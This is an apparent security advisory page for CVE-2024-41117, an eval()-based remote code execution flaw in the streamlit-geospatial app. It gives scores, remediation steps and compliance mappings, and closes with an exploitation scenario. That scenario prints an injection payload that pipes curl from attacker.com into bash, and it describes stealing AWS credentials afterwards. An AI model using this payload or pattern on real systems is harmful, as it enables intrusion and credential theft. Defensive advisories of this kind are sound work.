CVE-2024-41117 — CRITICAL (CVSS 9.8) AI Security Vulnerability

CISO Take

A critical unauthenticated RCE in streamlit-geospatial lets any attacker execute arbitrary Python code on exposed instances — no credentials, no interaction required. If your data science or geospatial ML teams run this app, patch to commit c4f81d96 immediately or take it offline. Post-exploitation access includes cloud credentials, datasets, and any ML infrastructure reachable from the host.

Risk Assessment

Critical. CVSS 9.8 with network-accessible, zero-auth, zero-user-interaction vector makes automated exploitation trivial — script-kiddie level. Python eval() of unvalidated user input grants full OS-level code execution. Data science environments typically carry elevated cloud IAM permissions and broad dataset access, significantly amplifying blast radius beyond the immediate host.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
streamlit-geospatial	pip	—	No patch
44.4K OpenSSF 7.2 2.8K dependents Pushed 7d ago 8% patched ~0d to patch Full package profile →

Do you use streamlit-geospatial? You're affected.

Severity & Risk

CVSS 3.1

9.8 / 10

EPSS

2.3%

chance of exploitation in 30 days

Higher than 85% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

Recommended Action

5 steps

Patch immediately: update to commit c4f81d9616d40c60584e36abb15300853a66e489 or later.
If patching is not immediately possible, take the instance offline or restrict access via network controls (firewall rules, VPN-only).
Hunt for compromise: review process logs for unexpected subprocess spawning, outbound connections, or file modifications in the app working directory.
Rotate all credentials accessible from the host (cloud API keys, database passwords, service tokens).
Inventory all internet-exposed Streamlit deployments across your organization — this pattern (eval on user input) may exist in other internal apps.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Framework AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0072 - Reverse Shell

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.3 - AI system security

NIST AI RMF

MANAGE 2.2 - Mechanisms to sustain the value of deployed AI systems

OWASP LLM Top 10

LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2024-41117?

A critical unauthenticated RCE in streamlit-geospatial lets any attacker execute arbitrary Python code on exposed instances — no credentials, no interaction required. If your data science or geospatial ML teams run this app, patch to commit c4f81d96 immediately or take it offline. Post-exploitation access includes cloud credentials, datasets, and any ML infrastructure reachable from the host.

Is CVE-2024-41117 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-41117, increasing the risk of exploitation.

How to fix CVE-2024-41117?

1. Patch immediately: update to commit c4f81d9616d40c60584e36abb15300853a66e489 or later. 2. If patching is not immediately possible, take the instance offline or restrict access via network controls (firewall rules, VPN-only). 3. Hunt for compromise: review process logs for unexpected subprocess spawning, outbound connections, or file modifications in the app working directory. 4. Rotate all credentials accessible from the host (cloud API keys, database passwords, service tokens). 5. Inventory all internet-exposed Streamlit deployments across your organization — this pattern (eval on user input) may exist in other internal apps.

What systems are affected by CVE-2024-41117?

This vulnerability affects the following AI/ML architecture patterns: Streamlit-based ML dashboards, geospatial data pipelines, Google Earth Engine integrations, ML data science environments.

What is the CVSS score for CVE-2024-41117?

CVE-2024-41117 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 2.33%.

Technical Details

NVD Description

streamlit-geospatial is a streamlit multipage app for geospatial applications. Prior to commit c4f81d9616d40c60584e36abb15300853a66e489, the `vis_params` variable on line 115 in `pages/10_🌍_Earth_Engine_Datasets.py` takes user input, which is later used in the `eval()` function on line 126, leading to remote code execution. Commit c4f81d9616d40c60584e36abb15300853a66e489 fixes this issue.

Exploitation Scenario

An attacker scans for internet-facing Streamlit apps (common ports 8501, 8080) via Shodan or Censys, identifies a streamlit-geospatial instance, and navigates to the Earth Engine Datasets page. They craft a malicious vis_params payload such as __import__('subprocess').Popen(['bash','-c','curl attacker.com/s|bash']). No authentication is required. The eval() call executes the payload, establishing a reverse shell. The attacker then harvests cloud credentials from environment variables or ~/.aws/credentials, enabling lateral movement into the victim's cloud infrastructure, ML data stores, and upstream CI/CD pipelines.